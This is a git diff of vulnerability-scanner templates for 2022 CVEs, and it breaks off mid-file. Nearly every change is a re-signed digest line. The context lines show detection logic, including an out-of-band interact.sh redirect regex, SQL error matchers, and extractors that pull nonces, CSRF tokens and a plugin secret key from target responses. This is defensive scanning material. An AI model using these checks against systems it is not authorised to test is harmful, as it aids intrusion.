490a00463044022060b8218674dd2c6a455a4bdba31e1b06ace9bacee0309165f804c75a860941eb022045c5acaccf4d06228363bf686e665ba42599b1a99820b52f999c8fa5b87d836b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f67741c7268f279cb65aeea7bd6e21006ec7fbc140f16c09292fd7324b7e65c3022008a10fbbc882ad6157306fc6fe18a7bba2b682010957afea63ab318c8a1406e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index e932178228..93263dc5bd 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d231078095447bd320631039dee869d6cbb6aa41162ce4d20df62ebb5f1fcf600221009d1396e605fd7dc03ef58d5bc874856dd17cbcc41ed9047bf399b019c4c91c88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200febb57e8c3aee4b73313a8bdf73df55aebca0fa768eea9cbbdeca86b8e581b102200158e5d4e0144d1ee628524d74a96da960a4b063fb2ebb80b84393c07f025e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 180e5f5564..5de49b06fa 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502205f7a431a1649486ee22a9408603c8699c32de96758253b4cdc2852c7bb979bdd022100f3a079da60a0b3dd22de503efd972c7c4d3e5773e0198087792b6b41e44e2e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090eae382645539cce8db7d5c8d08ad1759ba21131b4f6693fff4407f162bcc86022037497212dd6b50dfcd452c9c06ce37bef3fa61e3bff4324b112ad89b1e7c357b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index d01307aa57..7e3c3efc29 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -81,4 +81,4 @@ http: regex: - 'name="_csrf" content="(.*)"' internal: true -# digest: 490a0046304402206862f6cedae78e1be7b3fb449423df989aba5f79a58464dfdf723627158a590e022079c3eec48989b675d19b20bf089dfef10998b5f291e5177a0b9b7862808b8345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022034f359e6da198c9aa9d59b835bfa4da0c47d374d219d228481faacd36d1b8d2b022100e512d964c5f4bf885f34d4645822aa764cee7504a39714416fff903295205135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index feaf9c8580..2a0fcfc60a 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -46,4 +46,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "All Snippets")' condition: and -# digest: 4a0a00473045022100de5655af7dd9e8da3c4f797daac5beef773d572d7195389759a54ac348e8f53a022018b87700a693d57acf16843d51cab1a1b175bb6f6adf15e7c587624d26924d2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b32980c7114cd709456c3dc2981fea5cc461cdceea2fa72435ff2eaef203ffec0220073fa37edb8092f60568dcfaf1f76c0222a33a59781499c8ecea5fcbb9e667b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 1343c036b1..48a849cc41 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -63,4 +63,4 @@ http: - 'contains(header_3,"text/html")' - 'status_code_2 == 200 && status_code_3 == 200' condition: and -# digest: 490a0046304402204ec58d792beffdddd8520a47f39f107684b58874e924abe866191347ce01799d02206680604020300f5244d9e78173a6d9fefe3050b027124abbce04f1294a65198d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8bce570ebcb0f0d74eb041be1b52f254423a5768d3117aec796b360a124d195022100df65a65f7f5fa7a95872506df64e5f6d57b4e0e1279520187fc48d4f5a57ee19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index b782b6673e..5893e57577 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -61,4 +61,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "commentform")' condition: and -# digest: 4a0a004730450221009e46e7428c959e0b3480658a00e0a29e457a923114b749eb990552af2bcbb63102201d59805ee70142e2c08631780022d7fb2b0422d7a8099c53176239a8a5e3a374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9ec786e4d6dc6fef58e041447d7c41a0faee26b64048540df3166806e3b262d02202bde8319975e640eca903001b951c5994d5a9235422120bd5124fe19648dde1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index f5d82c6ace..b79d93e52a 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -64,4 +64,4 @@ http: - 'contains(header_3,"text/html")' - 'status_code_3==200' condition: and -# digest: 490a00463044022000cc9a8206ccbc823b71b7d11682af57eb62c7cd6d15308e393af5d9460b13a00220128133adc23ad3f11a14baec1fdfa7049669509da1033a5bb705a1ccb4e4e650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e4a03981dc32fe14244fb81dc5fbf27e611f0610881b12bab441ef665f244ce022100ca4d7b70e4c8aade25ea13a241809d1a4a6e8fcc75dabfbd42f23db0314190ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 8a414bcd31..ef21a9ce0f 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -74,4 +74,4 @@ http: - 'status_code_3==200' - 'contains(body_2,"bytes_uploaded")' condition: and -# digest: 4a0a0047304502204c9a4e25aee3216da25fd050f68cf7c0e5b0a4e65532f9f62d4b83f5058333e2022100dda270d1c7edbe6d34680d6f67ca827c790c9c53883fb2789a999d65b493962e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2d8f53b3f53eb6ddda6130f5f72bc085998bfcec56f9b2260573d215a2aef76022100cb30d3fe32e752b77aaeb9d16dfcd6db7be9b17e1f600c0c4ac6f59d56350341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index e1cd0ce752..20f2bab0f9 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -83,4 +83,4 @@ http: - '"' - 'smartertrack' condition: and -# digest: 4a0a00473045022100b4892f5c64f6232351379b197d1871d961f0b6c1bfe2c35aa9ec6b1fe287a6f202203f5de83f46a950369d103b2ff3e6f864c4508f0b7fbbef2ffdd5ae4281720fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e70d6d27e721e746a4f0f86c1a92c805c1750d983b403dae855bae8c048c157d0220008df64d41140572b4cf3da2514861c52335e045fbe683a179aee63fee0dd259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index d3cb312564..4de131b055 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -56,4 +56,4 @@ http: - "mysql_fetch" - "You have an error in your SQL syntax" condition: or -# digest: 4b0a00483046022100961135146cb72e5ec123441fa9ff5dac7ec092b87f38888f1877ff1a5aa84f1c0221009e345921fc3a9094d5fd253bed1e6361bfae6d60ab6455dcfdafe7658a132668:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba45b549e145408af633369b555485543fadac44bdd9055d24dd3b1aa2b7e6810220618bc9f7d62c05f168255ce97860dc0e76204349a61ffc57a6cefa9bf39a650c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 0153e3b3d4..a7845152f0 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -62,4 +62,4 @@ http: - '"BUILD_NUMBER":"([0-9]+)",' internal: true part: body -# digest: 4a0a00473045022100bb98caa57ec6e3ed65dcc5cfbfe03e4b587538e5e968b2097fac7c24343595bf022024df61662ad6dcdb68cd5e6cc916990b9854a8d8e027ac7f1651aee87880932c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e403ff912f48b0e4fc56a34aec2e8071bef293f7da2685cf615e8936416b411e0220071346853de912a910b2ce5e9e08fb45b83a98a0613c4a4c853eede70a3a4d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index e61feb47cc..0859f89d5c 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9539549dcfc756f1d0a2325969b03be5a4a019f130c94dca75be9859b0aa649022100dfa8df926228c77eb9d9593dcb7e8189e5d91eb3209ecf64297b5454a6c8cf88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b49c9a139031348d88e1292989218d050053caab0f929919163e12f6acd9755602207766eeef16b7181d17e57c0c9c44a82352ad8c1e21b61fd731ef973885726d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index a877ca379b..059eb71d6d 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -39,4 +39,4 @@ http: - type: word words: - "Interactsh Server" -# digest: 490a00463044022011000b62bbdc9d5f28cdb1540f0177002809856e4f065b19296986952d6abac5022034c9d32e197b3f27d3f1d38e02891c4f95987145301f02da2555758516aef94e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff5d90ca1d1b3da79372b1c211aaf83b4277abd36a80660e3cc2f2bb28b3af45022100a49d063ce970aff4bdd77c900a20eaa28edf17a3776039d446672ff67dc6c462:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 65623c2276..b15f8f3661 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100b34c9aac4b9a1b672c0d52fd667187a1d74768987e33b4d41b8b694a9f5802f5022100ed27bf9f661bb4e7471c509027150bf34f2905d0b15ff35d6fcd1b08022ad4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099cf7b401d12d74ed6b3e3cb7843ae70994f0020a30ef42cae07410922e0d799022100c732b7f6cb38a4fdb450bf0c3f513ea4197bf67458c16c953bb5842e6f30a2b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 8dedab97e0..7092a9c79e 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 480a00453043022063c0e55419c9314aa4179cbc620cda3fb24c5a8ec5f8a5bf570b4744cf6fd2d4021f5a44d8882c4a8b74f1f1a6a3d2651b10ecd553f39eb188a71f5c135ab2cde4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc612064e3643df18f893c74277d70fb9a15f6e13eb9f85f3a0a3bb6126f3aad02203177b61a36e74d7ad2cd14484de16a71d302ce8247adacd4eeb7d5eecb5a0920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index e2316e3ad5..a602a3869f 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220356cde1b887b5746d09e420786e7774b8306e1e99f930120cb47996c24a275b2022100a3c3b2747f775e12938742f69218d9d03766d557418c26f563d6c42da95b6326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ade2be3b76793478fedfa3024140b02e074968d76d3d8baf0b3309c3eb528c670220702937b18bd3eda17f033654fd689cf0ba239e82e0804bd4ee53eb336caed0cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 177e89d6c2..003da4d752 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -50,4 +50,4 @@ http: part: header words: - text/html -# digest: 4b0a00483046022100dd79aa0474a89a2ac03e8147296d8958bd8863792570ee2d226ce4ef2bb5fe47022100f21bdc20c0df7169bf401f396d4d70048dddd98be918337c91d990bd543060b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041033a219f77db0b218a8c5c9051700448dd1a31a46099f056f2d466e1ade55202202c4b80b0623b0b70c68495ceefcec3005b91cf5c32dc9efef87c34b544d07c2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 1380d9c461..06f3feb2cf 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220769f0b22c82a753d0e8d77f012b14207ab4c56507605203f5ed415c7de1fcce0022100b0dfc7497219b96863930792f0fc57dd921a58d19ee3eccdbb2cbe6364059fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce258f974df3c8faf060626f029d8f885e495283935d860f7aaad4bee6bac842022069960f0fba62fbb5c1b815fa7c52e882675d6750af21c7c29ba98373226c8c81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 98e6deb6ea..5b18ee3fda 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab2d16fe98044552f6b033c5d66ef9d749c2577f4ba89980e3804e6e0961c42002204911d612998bfb262eb6fdacd0a6fc2a9e74331eeba778603ed15a039ec9d16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8de283883e3fdfd1e54268406adbc0d6a29efc03623b6530af3ae535d385443022100f0f801a792b1ae39a2af7999cf7a6942f263f25a2b2f3d6786a0cdc1cb223cc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 622ea8f31c..9b2466f4cd 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -60,4 +60,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4a0a00473045022100ca848fcb45e23d7d210462b4aa7c89510aa622fe4bb4c0639f5035c1e09b2a5902205b9422a4700bd06f51bc7edd9a951403e9ad2145500336c3690f7beed9414f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1b3089f521497de75a298ec2b19e76ba63b440b3be4c4d1992763acf0111ec10221009de03d65b6ddf4245ec60b34a6670600703456d29976cbc448386780ec3e0e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index a39264b6c3..cfd50046d3 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -59,4 +59,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4a0a00473045022100f3ab364d23921ccdb931455c9ebd80865bd26ddd8d85a85e5c2f6fc86842424e022068720cfe546b2bb14a734450dfc5bdad56751bcdaef77f99acb548fddcb1ac38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084f2ef26eebc2ab228387073ab5586b446941d803b2fa941c7b7294dcc365f64022100b10e0d2b493485ad23cdee2ee00592ddc459576e58f2fb9d306f92129672792c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index d7cb89b2fb..9850f623cb 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f6ae7c1e6a044dfb0d2128ba0584e801d970fb9556d08d9a0525a2a896768f502202d00ccb4c7597331865d1c3b386225396ccb8816353db36cda136dc03489c824:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205323a679ef9abeed79ff1f82ecb84674929aba02ed11ee2676f47452ee634f2c02204bfdd091f0100710f583e0a2e0755167939999a62dd84a6ee9e6ee75a4c1c14f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index edb2633bde..34dc6a930b 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022100e86147269d500eee87a76dc8b3d4d6b539f23c5c25293ad044322e223159453702203e3e862ec74768390d0b5445cfb478c43678e1e7109cd2e1d3f97e9bb17fdd90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1f93640c8017dbc21a9a6aeaf34bd035e2d2d6292c09cb51f9030dcba2fc74b02200e74afbec04cafcb321f4846debadbb1808f5ef0e484f7fca55e2960f8d5c3ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 255b0eb855..a987a5e5be 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "searchwp-live-search-result")' condition: and -# digest: 4a0a0047304502205c29befeae02b026b93a42c98ea54d1b6f5efaa102360055dbea4e7481f39b2f022100ad34ac1dc40f5d04fff554cad7674c9ca60fdd3db66a66b792e9e79ff14bca98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce99a810f18c3580dc53dec26f654ec5a94675757e364472d20001b98ca728c4022075bf8b9ccb4a047229ba32d4ca1f30080beffcb0977cae4ffd8d4fda0f321d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 3bb3c6a4b9..a863557fae 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207eaf7f3b8339b01fbf9d09efa0a1c48df53a4c44ce469786dd22d682531bb04d022100b158dfc406ffdb342ad75451f95e9b78f8fa9072ec60c97cfcb702e67a2736f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fcd9816f08457977ac3b55c1a3cf825033d2ed8d1c332c96ff28705868e4f650022100dbe371c9acb648faacc3c92bd31b064f53fdbe17b3e46eb0e9595c4deb0bcfd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 1585e86903..94ca13c528 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -62,4 +62,4 @@ http: regex: - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"' internal: true -# digest: 4b0a00483046022100b7d06ce856a168a95b454d4325f60f812325ac99d80ba9a9b145c641a5457c16022100c7ea3daf3be143b3953ed74dea7edd703e5b7825a231fba31a84de3c93d919c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220382595b1fe015bbae0d9d442bbc2c4b5365f958a0759d8d73297fb9a2f2b7c6902200aee35dfb62b444bf5135bd6fc42131215628944e655dd93608c908b62a28b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 209f223789..d6c5a5d55f 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -55,4 +55,4 @@ http: - 500 - 404 condition: or -# digest: 4a0a004730450220152a665e7b3a3c19077e3bf8a9d5f588afd66692737ed127dea8c823f9a1dd04022100d65ce7ec17220bbd6cfd2f3278886cd52b2f34beaae8509405bcfd1affd9940f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b496345378ef7c5282eccf0ef4750c6c8be7b5d9ead61c0d0e8699049a7a1f6402210099374a6431005d5758183a4b42b31f0edbd2a5764afc3ca59af2ef7e03953fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 49c1685267..95b25bc235 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -68,4 +68,4 @@ http: regex: - SET avatar = '(.*?)' internal: true -# digest: 480a00453043022053b2e71d759824bf37ef2cafa971723f16645d2288e9f56f34337b2cc04e3522021f2d387dd0cd19bc32b46742661ac827c6e9f2781f7ee711c0df141fc4303737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a62df045c76e53bf8e6d631a87d8bf926e477a73cbc8494b2dcc7907e1e69ee1022052681e039ce72426d5d56584c8a0281f8e10794b22967d1474b0aefcaa6f2e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index ae416a1bbe..7ef6b61cd8 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ba616440a48cd79fed0fbb82c74d5b423c176fb2058b2a6e108042d3b7e3f6860220327a46e6573a290031f738c2c771cfdb4e8d33eafa4d6bacb46ae741a85abac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bd7032118d5c5096703225ebc34ac11a12b2263b1f9933c97278173beb1b586022100c3ce319ef00a2447733d4ac70007351b8fb205432ed35ec8def3c707fae705f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 9873fbef5f..ca250d4a96 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e86958e748c94fb8894ce5d8e4ffb93f8142bb6942eda24333c6c89421e8ce00220055ccece3bbea309d872f93ae879a2c5d76a3cac9162862159898803a6a7f9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c4df5d2066e6268f3acbd183dc87c66c840453a576c416933e1d15f0d828d3c022100a4a86a643deb305983a1eacca72a65d4c2a3cb0b64dafefbdfdcd898c74bc4d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index e0943c18f4..645d854f40 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058b2345a7931d57a2c005b13d6444c706fd67511a9cfd652adc58a44381d1dd4022100a9b711eeffbbf37010a1f9ac104d9745baab70e7beb8354db4179e48762fd500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b88fc37bec53086c40a2dab39585c96a5b146c52946e88686cea2be9f6ddf6002206caa29030300ee31f345d6a9a8dff7b389b4fec4576d174a277b621633d1839b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index e9d1ab7748..a2ee72f049 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c0eb31344ab3448d9fd654d7f0e2b8986db5171ee7fc2614b030cda3446cbcd70220546b8923bf2af5f8e75906a0e4b482a48b43d49e5bd90af2be8c05d0b606f05e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046f3415c25e4170d3a1e7eafedf7b6545c403151d253702b842924c160136f30022100efa20445934086bb0d0bec0aa8e0d036327507e7b5f662c630e6648262e40f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 4cd1769995..6cb8ae33eb 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100afd7ffdc412d5cbffebb6acdf1850cbcc2f20ebe9e9b5e56d2573c3e144242fb022100c25d1c6e7cdb06d86355391d4e7fe15b393dc72e717e0c1b998da4bfc729663a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fbbbb976d8ec173fa0b4b3fc0690cb96e8129fa7ad1ea9dd2f5ab4b958b3ef20220034df02d68653a3be20b73be3ee6bed59e6e53d12887f4a26b9590ce712eaba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index 0b720ebdf2..2e733b9741 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -58,4 +58,4 @@ http: kval: - "x_cmd_response" part: header -# digest: 490a00463044022043923188d8f26d3bad64b5b6194f0d26c0205ef1d053c1e84a0b3122538323a802202d862f6fca847a1e99d6ec7e4b694f266cd8b0409ca139653667b057d5873735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c4c2bddd8a5eb51b19b59ae34437762eff3249e20f46ff34be84566f6b41ec2022100ec4f8677c9bf0dd38acbd6da055006ca71ba1b7434da22e5cdb9c4fc2c54f15b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index ef8f87f412..1aa280004b 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -50,4 +50,4 @@ http: - type: dsl dsl: - 'location == "/httpvoid.action"' -# digest: 4a0a004730450220422bbf1147e32d7098167fda41b6ebbbab0fb1a33273478a0fe42870a6364d550221009183ec3599722164f7c06a16c6983fbd3faab1b36f05b0913935b8d6339e5f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100863824d1fc782c5fabc3dea7419d4b3c5b4bcaf83ab4b9fe66594b79ea2209a802204a42e7087082e472a4cc05bab3a0a30dbf881746e790b03855537d4c264dc1aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index e8e00bbee9..96532ca591 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml 